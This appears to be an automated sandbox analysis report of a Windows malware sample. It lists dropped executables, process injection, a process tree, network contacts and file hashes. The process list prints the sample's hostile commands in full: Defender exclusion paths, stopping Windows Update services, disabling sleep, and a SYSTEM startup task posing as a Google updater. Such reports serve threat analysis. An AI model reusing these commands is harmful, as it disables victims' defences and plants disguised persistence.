File created C:\Program Files (x86)\xrecode3\bin\x86\is-TKQK2.tmp C:\Users\Admin\AppData\Local\Temp\is-Q1TSP.tmp\tuc3.tmp N/A
File created C:\Program Files (x86)\xrecode3\bin\x86\is-J225L.tmp C:\Users\Admin\AppData\Local\Temp\is-Q1TSP.tmp\tuc3.tmp N/A
File created C:\Program Files (x86)\xrecode3\bin\x86\is-6HA0E.tmp C:\Users\Admin\AppData\Local\Temp\is-Q1TSP.tmp\tuc3.tmp N/A
File created C:\Program Files (x86)\xrecode3\bin\x86\is-O09NH.tmp C:\Users\Admin\AppData\Local\Temp\is-Q1TSP.tmp\tuc3.tmp N/A
File created C:\Program Files (x86)\xrecode3\bin\x86\is-LKG32.tmp C:\Users\Admin\AppData\Local\Temp\is-Q1TSP.tmp\tuc3.tmp N/A
File created C:\Program Files (x86)\xrecode3\bin\x86\is-OPU6H.tmp C:\Users\Admin\AppData\Local\Temp\is-Q1TSP.tmp\tuc3.tmp N/A
File created C:\Program Files (x86)\xrecode3\bin\x86\is-JTNOC.tmp C:\Users\Admin\AppData\Local\Temp\is-Q1TSP.tmp\tuc3.tmp N/A
File created C:\Program Files (x86)\xrecode3\bin\x86\is-T4H87.tmp C:\Users\Admin\AppData\Local\Temp\is-Q1TSP.tmp\tuc3.tmp N/A
File created C:\Program Files (x86)\xrecode3\bin\x86\is-PG79Q.tmp C:\Users\Admin\AppData\Local\Temp\is-Q1TSP.tmp\tuc3.tmp N/A
File created C:\Program Files (x86)\xrecode3\bin\x86\is-56FP5.tmp C:\Users\Admin\AppData\Local\Temp\is-Q1TSP.tmp\tuc3.tmp N/A
File created C:\Program Files (x86)\xrecode3\bin\x86\is-P7QHH.tmp C:\Users\Admin\AppData\Local\Temp\is-Q1TSP.tmp\tuc3.tmp N/A
File created C:\Program Files (x86)\xrecode3\bin\x86\is-7A8FF.tmp C:\Users\Admin\AppData\Local\Temp\is-Q1TSP.tmp\tuc3.tmp N/A
File created C:\Program Files (x86)\xrecode3\bin\x86\is-VP10Q.tmp C:\Users\Admin\AppData\Local\Temp\is-Q1TSP.tmp\tuc3.tmp N/A
File created C:\Program Files (x86)\xrecode3\stuff\is-HTCD4.tmp C:\Users\Admin\AppData\Local\Temp\is-Q1TSP.tmp\tuc3.tmp N/A
File created C:\Program Files (x86)\xrecode3\bin\x86\is-JS30A.tmp C:\Users\Admin\AppData\Local\Temp\is-Q1TSP.tmp\tuc3.tmp N/A
File created C:\Program Files (x86)\xrecode3\bin\x86\is-UA3CG.tmp C:\Users\Admin\AppData\Local\Temp\is-Q1TSP.tmp\tuc3.tmp N/A
File created C:\Program Files (x86)\xrecode3\bin\x86\is-2R912.tmp C:\Users\Admin\AppData\Local\Temp\is-Q1TSP.tmp\tuc3.tmp N/A
File created C:\Program Files (x86)\xrecode3\bin\x86\is-TONQ3.tmp C:\Users\Admin\AppData\Local\Temp\is-Q1TSP.tmp\tuc3.tmp N/A
File created C:\Program Files (x86)\xrecode3\bin\x86\is-AC188.tmp C:\Users\Admin\AppData\Local\Temp\is-Q1TSP.tmp\tuc3.tmp N/A
File created C:\Program Files (x86)\xrecode3\bin\x86\is-75DRS.tmp C:\Users\Admin\AppData\Local\Temp\is-Q1TSP.tmp\tuc3.tmp N/A
File created C:\Program Files (x86)\xrecode3\bin\x86\is-SC8LN.tmp C:\Users\Admin\AppData\Local\Temp\is-Q1TSP.tmp\tuc3.tmp N/A
File created C:\Program Files (x86)\xrecode3\bin\x86\is-HNVCA.tmp C:\Users\Admin\AppData\Local\Temp\is-Q1TSP.tmp\tuc3.tmp N/A
File created C:\Program Files (x86)\xrecode3\bin\x86\is-NRF0U.tmp C:\Users\Admin\AppData\Local\Temp\is-Q1TSP.tmp\tuc3.tmp N/A
File created C:\Program Files (x86)\xrecode3\bin\x86\is-M3DEL.tmp C:\Users\Admin\AppData\Local\Temp\is-Q1TSP.tmp\tuc3.tmp N/A
File created C:\Program Files (x86)\xrecode3\bin\x86\is-C1LN7.tmp C:\Users\Admin\AppData\Local\Temp\is-Q1TSP.tmp\tuc3.tmp N/A
File created C:\Program Files (x86)\xrecode3\bin\x86\is-8E9TH.tmp C:\Users\Admin\AppData\Local\Temp\is-Q1TSP.tmp\tuc3.tmp N/A
File created C:\Program Files (x86)\xrecode3\bin\x86\is-N29E6.tmp C:\Users\Admin\AppData\Local\Temp\is-Q1TSP.tmp\tuc3.tmp N/A
File created C:\Program Files (x86)\xrecode3\bin\x86\is-TUP7T.tmp C:\Users\Admin\AppData\Local\Temp\is-Q1TSP.tmp\tuc3.tmp N/A
File created C:\Program Files (x86)\xrecode3\bin\x86\is-773TJ.tmp C:\Users\Admin\AppData\Local\Temp\is-Q1TSP.tmp\tuc3.tmp N/A
File created C:\Program Files (x86)\xrecode3\bin\x86\plugins\internal\is-S6NSF.tmp C:\Users\Admin\AppData\Local\Temp\is-Q1TSP.tmp\tuc3.tmp N/A
File created C:\Program Files (x86)\xrecode3\bin\x86\plugins\internal\is-FLJO1.tmp C:\Users\Admin\AppData\Local\Temp\is-Q1TSP.tmp\tuc3.tmp N/A
File created C:\Program Files (x86)\xrecode3\is-DFEK0.tmp C:\Users\Admin\AppData\Local\Temp\is-Q1TSP.tmp\tuc3.tmp N/A
File created C:\Program Files (x86)\xrecode3\bin\x86\is-GS1DF.tmp C:\Users\Admin\AppData\Local\Temp\is-Q1TSP.tmp\tuc3.tmp N/A
File created C:\Program Files (x86)\xrecode3\bin\x86\is-H37O2.tmp C:\Users\Admin\AppData\Local\Temp\is-Q1TSP.tmp\tuc3.tmp N/A
File created C:\Program Files (x86)\xrecode3\bin\x86\is-M60G9.tmp C:\Users\Admin\AppData\Local\Temp\is-Q1TSP.tmp\tuc3.tmp N/A
File created C:\Program Files (x86)\xrecode3\bin\x86\is-Q3N15.tmp C:\Users\Admin\AppData\Local\Temp\is-Q1TSP.tmp\tuc3.tmp N/A
File created C:\Program Files (x86)\xrecode3\bin\x86\lessmsi\is-HNIOE.tmp C:\Users\Admin\AppData\Local\Temp\is-Q1TSP.tmp\tuc3.tmp N/A
File created C:\Program Files (x86)\xrecode3\bin\x86\is-P4P8Q.tmp C:\Users\Admin\AppData\Local\Temp\is-Q1TSP.tmp\tuc3.tmp N/A
File created C:\Program Files (x86)\xrecode3\install\unins000.dat C:\Users\Admin\AppData\Local\Temp\is-Q1TSP.tmp\tuc3.tmp N/A
File created C:\Program Files (x86)\xrecode3\bin\x86\is-SKAJ1.tmp C:\Users\Admin\AppData\Local\Temp\is-Q1TSP.tmp\tuc3.tmp N/A
File created C:\Program Files (x86)\xrecode3\bin\x86\is-4TASE.tmp C:\Users\Admin\AppData\Local\Temp\is-Q1TSP.tmp\tuc3.tmp N/A
File created C:\Program Files (x86)\xrecode3\install\is-9TPRH.tmp C:\Users\Admin\AppData\Local\Temp\is-Q1TSP.tmp\tuc3.tmp N/A
File created C:\Program Files (x86)\xrecode3\stuff\is-19AA3.tmp C:\Users\Admin\AppData\Local\Temp\is-Q1TSP.tmp\tuc3.tmp N/A
File opened for modification C:\Program Files (x86)\xrecode3\install\unins000.dat C:\Users\Admin\AppData\Local\Temp\is-Q1TSP.tmp\tuc3.tmp N/A
File created C:\Program Files (x86)\xrecode3\stuff\is-08BFP.tmp C:\Users\Admin\AppData\Local\Temp\is-Q1TSP.tmp\tuc3.tmp N/A
File created C:\Program Files (x86)\xrecode3\bin\x86\is-GQ6OM.tmp C:\Users\Admin\AppData\Local\Temp\is-Q1TSP.tmp\tuc3.tmp N/A
File created C:\Program Files (x86)\xrecode3\bin\x86\is-33U2U.tmp C:\Users\Admin\AppData\Local\Temp\is-Q1TSP.tmp\tuc3.tmp N/A
File created C:\Program Files (x86)\xrecode3\bin\x86\is-SDNEI.tmp C:\Users\Admin\AppData\Local\Temp\is-Q1TSP.tmp\tuc3.tmp N/A
File created C:\Program Files (x86)\xrecode3\bin\x86\is-PIJ7J.tmp C:\Users\Admin\AppData\Local\Temp\is-Q1TSP.tmp\tuc3.tmp N/A
File created C:\Program Files (x86)\xrecode3\bin\x86\is-34674.tmp C:\Users\Admin\AppData\Local\Temp\is-Q1TSP.tmp\tuc3.tmp N/A
File created C:\Program Files (x86)\xrecode3\bin\x86\is-JAT3P.tmp C:\Users\Admin\AppData\Local\Temp\is-Q1TSP.tmp\tuc3.tmp N/A
File created C:\Program Files (x86)\xrecode3\stuff\is-74KT5.tmp C:\Users\Admin\AppData\Local\Temp\is-Q1TSP.tmp\tuc3.tmp N/A
File created C:\Program Files (x86)\xrecode3\bin\x86\is-205VN.tmp C:\Users\Admin\AppData\Local\Temp\is-Q1TSP.tmp\tuc3.tmp N/A
File created C:\Program Files (x86)\xrecode3\bin\x86\is-53DRO.tmp C:\Users\Admin\AppData\Local\Temp\is-Q1TSP.tmp\tuc3.tmp N/A
File created C:\Program Files (x86)\xrecode3\bin\x86\is-GFECJ.tmp C:\Users\Admin\AppData\Local\Temp\is-Q1TSP.tmp\tuc3.tmp N/A
File created C:\Program Files (x86)\xrecode3\bin\x86\is-537HK.tmp C:\Users\Admin\AppData\Local\Temp\is-Q1TSP.tmp\tuc3.tmp N/A
File created C:\Program Files (x86)\xrecode3\bin\x86\is-TAJQS.tmp C:\Users\Admin\AppData\Local\Temp\is-Q1TSP.tmp\tuc3.tmp N/A
File opened for modification C:\Program Files (x86)\xrecode3\xrecode3.exe C:\Users\Admin\AppData\Local\Temp\is-Q1TSP.tmp\tuc3.tmp N/A
File created C:\Program Files (x86)\xrecode3\bin\x86\is-01OB0.tmp C:\Users\Admin\AppData\Local\Temp\is-Q1TSP.tmp\tuc3.tmp N/A
File created C:\Program Files (x86)\xrecode3\bin\x86\is-IIB1J.tmp C:\Users\Admin\AppData\Local\Temp\is-Q1TSP.tmp\tuc3.tmp N/A
File created C:\Program Files (x86)\xrecode3\bin\x86\is-V9BA3.tmp C:\Users\Admin\AppData\Local\Temp\is-Q1TSP.tmp\tuc3.tmp N/A

Launches sc.exe

Description Indicator Process Target
N/A N/A C:\Windows\System32\sc.exe N/A
N/A N/A C:\Windows\System32\sc.exe N/A
N/A N/A C:\Windows\System32\sc.exe N/A
N/A N/A C:\Windows\System32\sc.exe N/A
N/A N/A C:\Windows\System32\sc.exe N/A

Enumerates physical storage devices

Checks SCSI registry key(s)

Description Indicator Process Target
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\0x0006000000023234-4438.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\0x0006000000023234-4438.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\0x0006000000023234-4438.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A

Runs net.exe

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\0x0006000000023234-4438.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\0x0006000000023234-4438.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\0x0006000000023234-4438.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Broom.exe N/A

Suspicious use of UnmapMainImage

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3384 wrote to memory of 4608 N/A N/A C:\Users\Admin\AppData\Local\Temp\9630.exe
PID 3384 wrote to memory of 4608 N/A N/A C:\Users\Admin\AppData\Local\Temp\9630.exe
PID 3384 wrote to memory of 4608 N/A N/A C:\Users\Admin\AppData\Local\Temp\9630.exe
PID 3384 wrote to memory of 4540 N/A N/A C:\Users\Admin\AppData\Local\Temp\9438.exe
PID 3384 wrote to memory of 4540 N/A N/A C:\Users\Admin\AppData\Local\Temp\9438.exe
PID 3384 wrote to memory of 4540 N/A N/A C:\Users\Admin\AppData\Local\Temp\9438.exe
PID 3384 wrote to memory of 844 N/A N/A C:\Users\Admin\AppData\Local\Temp\A04F.exe
PID 3384 wrote to memory of 844 N/A N/A C:\Users\Admin\AppData\Local\Temp\A04F.exe
PID 3384 wrote to memory of 844 N/A N/A C:\Users\Admin\AppData\Local\Temp\A04F.exe
PID 4540 wrote to memory of 660 N/A C:\Users\Admin\AppData\Local\Temp\9438.exe C:\Users\Admin\AppData\Local\Temp\InstallSetup9.exe
PID 4540 wrote to memory of 660 N/A C:\Users\Admin\AppData\Local\Temp\9438.exe C:\Users\Admin\AppData\Local\Temp\InstallSetup9.exe
PID 4540 wrote to memory of 660 N/A C:\Users\Admin\AppData\Local\Temp\9438.exe C:\Users\Admin\AppData\Local\Temp\InstallSetup9.exe
PID 4540 wrote to memory of 4632 N/A C:\Users\Admin\AppData\Local\Temp\9438.exe C:\Users\Admin\AppData\Local\Temp\toolspub2.exe
PID 4540 wrote to memory of 4632 N/A C:\Users\Admin\AppData\Local\Temp\9438.exe C:\Users\Admin\AppData\Local\Temp\toolspub2.exe
PID 4540 wrote to memory of 4632 N/A C:\Users\Admin\AppData\Local\Temp\9438.exe C:\Users\Admin\AppData\Local\Temp\toolspub2.exe
PID 4540 wrote to memory of 4840 N/A C:\Users\Admin\AppData\Local\Temp\9438.exe C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
PID 4540 wrote to memory of 4840 N/A C:\Users\Admin\AppData\Local\Temp\9438.exe C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
PID 4540 wrote to memory of 4840 N/A C:\Users\Admin\AppData\Local\Temp\9438.exe C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
PID 4540 wrote to memory of 4700 N/A C:\Users\Admin\AppData\Local\Temp\9438.exe C:\Users\Admin\AppData\Local\Temp\tuc3.exe
PID 4540 wrote to memory of 4700 N/A C:\Users\Admin\AppData\Local\Temp\9438.exe C:\Users\Admin\AppData\Local\Temp\tuc3.exe
PID 4540 wrote to memory of 4700 N/A C:\Users\Admin\AppData\Local\Temp\9438.exe C:\Users\Admin\AppData\Local\Temp\tuc3.exe
PID 660 wrote to memory of 1344 N/A C:\Users\Admin\AppData\Local\Temp\InstallSetup9.exe C:\Users\Admin\AppData\Local\Temp\Broom.exe
PID 660 wrote to memory of 1344 N/A C:\Users\Admin\AppData\Local\Temp\InstallSetup9.exe C:\Users\Admin\AppData\Local\Temp\Broom.exe
PID 660 wrote to memory of 1344 N/A C:\Users\Admin\AppData\Local\Temp\InstallSetup9.exe C:\Users\Admin\AppData\Local\Temp\Broom.exe
PID 4540 wrote to memory of 3332 N/A C:\Users\Admin\AppData\Local\Temp\9438.exe C:\Users\Admin\AppData\Local\Temp\latestX.exe
PID 4540 wrote to memory of 3332 N/A C:\Users\Admin\AppData\Local\Temp\9438.exe C:\Users\Admin\AppData\Local\Temp\latestX.exe
PID 4700 wrote to memory of 4880 N/A C:\Users\Admin\AppData\Local\Temp\tuc3.exe C:\Users\Admin\AppData\Local\Temp\is-Q1TSP.tmp\tuc3.tmp
PID 4700 wrote to memory of 4880 N/A C:\Users\Admin\AppData\Local\Temp\tuc3.exe C:\Users\Admin\AppData\Local\Temp\is-Q1TSP.tmp\tuc3.tmp
PID 4700 wrote to memory of 4880 N/A C:\Users\Admin\AppData\Local\Temp\tuc3.exe C:\Users\Admin\AppData\Local\Temp\is-Q1TSP.tmp\tuc3.tmp
PID 4880 wrote to memory of 4120 N/A C:\Users\Admin\AppData\Local\Temp\is-Q1TSP.tmp\tuc3.tmp C:\Windows\SysWOW64\schtasks.exe
PID 4880 wrote to memory of 4120 N/A C:\Users\Admin\AppData\Local\Temp\is-Q1TSP.tmp\tuc3.tmp C:\Windows\SysWOW64\schtasks.exe
PID 4880 wrote to memory of 4120 N/A C:\Users\Admin\AppData\Local\Temp\is-Q1TSP.tmp\tuc3.tmp C:\Windows\SysWOW64\schtasks.exe
PID 4880 wrote to memory of 2132 N/A C:\Users\Admin\AppData\Local\Temp\is-Q1TSP.tmp\tuc3.tmp C:\Program Files (x86)\xrecode3\xrecode3.exe
PID 4880 wrote to memory of 2132 N/A C:\Users\Admin\AppData\Local\Temp\is-Q1TSP.tmp\tuc3.tmp C:\Program Files (x86)\xrecode3\xrecode3.exe
PID 4880 wrote to memory of 2132 N/A C:\Users\Admin\AppData\Local\Temp\is-Q1TSP.tmp\tuc3.tmp C:\Program Files (x86)\xrecode3\xrecode3.exe
PID 4880 wrote to memory of 4308 N/A C:\Users\Admin\AppData\Local\Temp\is-Q1TSP.tmp\tuc3.tmp C:\Windows\SysWOW64\net.exe
PID 4880 wrote to memory of 4308 N/A C:\Users\Admin\AppData\Local\Temp\is-Q1TSP.tmp\tuc3.tmp C:\Windows\SysWOW64\net.exe
PID 4880 wrote to memory of 4308 N/A C:\Users\Admin\AppData\Local\Temp\is-Q1TSP.tmp\tuc3.tmp C:\Windows\SysWOW64\net.exe
PID 4880 wrote to memory of 4028 N/A C:\Users\Admin\AppData\Local\Temp\is-Q1TSP.tmp\tuc3.tmp C:\Program Files (x86)\xrecode3\xrecode3.exe
PID 4632 wrote to memory of 3356 N/A C:\Users\Admin\AppData\Local\Temp\toolspub2.exe C:\Users\Admin\AppData\Local\Temp\toolspub2.exe
PID 4880 wrote to memory of 4028 N/A C:\Users\Admin\AppData\Local\Temp\is-Q1TSP.tmp\tuc3.tmp C:\Program Files (x86)\xrecode3\xrecode3.exe
PID 4880 wrote to memory of 4028 N/A C:\Users\Admin\AppData\Local\Temp\is-Q1TSP.tmp\tuc3.tmp C:\Program Files (x86)\xrecode3\xrecode3.exe
PID 4632 wrote to memory of 3356 N/A C:\Users\Admin\AppData\Local\Temp\toolspub2.exe C:\Users\Admin\AppData\Local\Temp\toolspub2.exe
PID 4632 wrote to memory of 3356 N/A C:\Users\Admin\AppData\Local\Temp\toolspub2.exe C:\Users\Admin\AppData\Local\Temp\toolspub2.exe
PID 4632 wrote to memory of 3356 N/A C:\Users\Admin\AppData\Local\Temp\toolspub2.exe C:\Users\Admin\AppData\Local\Temp\toolspub2.exe
PID 4632 wrote to memory of 3356 N/A C:\Users\Admin\AppData\Local\Temp\toolspub2.exe C:\Users\Admin\AppData\Local\Temp\toolspub2.exe
PID 4632 wrote to memory of 3356 N/A C:\Users\Admin\AppData\Local\Temp\toolspub2.exe C:\Users\Admin\AppData\Local\Temp\toolspub2.exe
PID 4308 wrote to memory of 432 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 4308 wrote to memory of 432 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 4308 wrote to memory of 432 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\0x0006000000023234-4438.exe

"C:\Users\Admin\AppData\Local\Temp\0x0006000000023234-4438.exe"

C:\Users\Admin\AppData\Local\Temp\9630.exe

C:\Users\Admin\AppData\Local\Temp\9630.exe

C:\Users\Admin\AppData\Local\Temp\9438.exe

C:\Users\Admin\AppData\Local\Temp\9438.exe

C:\Users\Admin\AppData\Local\Temp\A04F.exe

C:\Users\Admin\AppData\Local\Temp\A04F.exe

C:\Users\Admin\AppData\Local\Temp\InstallSetup9.exe

"C:\Users\Admin\AppData\Local\Temp\InstallSetup9.exe"

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"

C:\Users\Admin\AppData\Local\Temp\tuc3.exe

"C:\Users\Admin\AppData\Local\Temp\tuc3.exe"

C:\Users\Admin\AppData\Local\Temp\Broom.exe

C:\Users\Admin\AppData\Local\Temp\Broom.exe

C:\Users\Admin\AppData\Local\Temp\latestX.exe

"C:\Users\Admin\AppData\Local\Temp\latestX.exe"

C:\Users\Admin\AppData\Local\Temp\is-Q1TSP.tmp\tuc3.tmp

"C:\Users\Admin\AppData\Local\Temp\is-Q1TSP.tmp\tuc3.tmp" /SL5="$6011E,8423542,54272,C:\Users\Admin\AppData\Local\Temp\tuc3.exe"

C:\Program Files (x86)\xrecode3\xrecode3.exe

"C:\Program Files (x86)\xrecode3\xrecode3.exe" -i

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\system32\schtasks.exe" /Query

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"

C:\Program Files (x86)\xrecode3\xrecode3.exe

"C:\Program Files (x86)\xrecode3\xrecode3.exe" -s

C:\Windows\SysWOW64\net.exe

"C:\Windows\system32\net.exe" helpmsg 1

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 helpmsg 1

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"

C:\Program Files\Google\Chrome\updater.exe

"C:\Program Files\Google\Chrome\updater.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

Network

Country Destination Domain Proto
US 8.8.8.8:53 140.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 241.154.82.20.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.200:443 g.bing.com tcp
US 8.8.8.8:53 200.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 59.128.231.4.in-addr.arpa udp
US 8.8.8.8:53 55.36.223.20.in-addr.arpa udp
US 8.8.8.8:53 41.110.16.96.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 158.240.127.40.in-addr.arpa udp
RU 81.19.131.34:80 81.19.131.34 tcp
US 8.8.8.8:53 34.131.19.81.in-addr.arpa udp
RU 185.172.128.19:80 185.172.128.19 tcp
US 8.8.8.8:53 19.128.172.185.in-addr.arpa udp
US 8.8.8.8:53 26.165.165.52.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 13.227.111.52.in-addr.arpa udp
RU 81.19.131.34:80 81.19.131.34 tcp
MD 176.123.7.190:32927 tcp
US 8.8.8.8:53 190.7.123.176.in-addr.arpa udp
US 8.8.8.8:53 43.58.199.20.in-addr.arpa udp
US 8.8.8.8:53 14.173.189.20.in-addr.arpa udp

Files

memory/4852-0-0x0000000000400000-0x000000000040B000-memory.dmp

memory/3384-1-0x0000000000880000-0x0000000000896000-memory.dmp

memory/4852-3-0x0000000000400000-0x000000000040B000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\9630.exe

MD5 f88edad62a7789c2c5d8047133da5fa7
SHA1 41b1f056cdda764a1c7c402c6fa4f8ab2f3ce5f9
SHA256 eb2b1ce5574096b91eb9e0482117d2518ab188c0747a209dc77e88d30bb970dc
SHA512 e2d5b0ace5dfd3bd2321b2a42b7e7725071ca440389dc5ef12720a34727ae84c2907cd7befeae5d53568d9deaee8443f4cbda44b598cfc9b6316d9389be09a60

C:\Users\Admin\AppData\Local\Temp\9438.exe

MD5 d0c59443e41e1160209139841fa39c9f
SHA1 76be0077ce9dc5ef6756b8c202a6d5d94c759535
SHA256 de3b8eeffa2d3ce30a578af1de877afd5831e428ca7c0767933d6e6af9ac815c
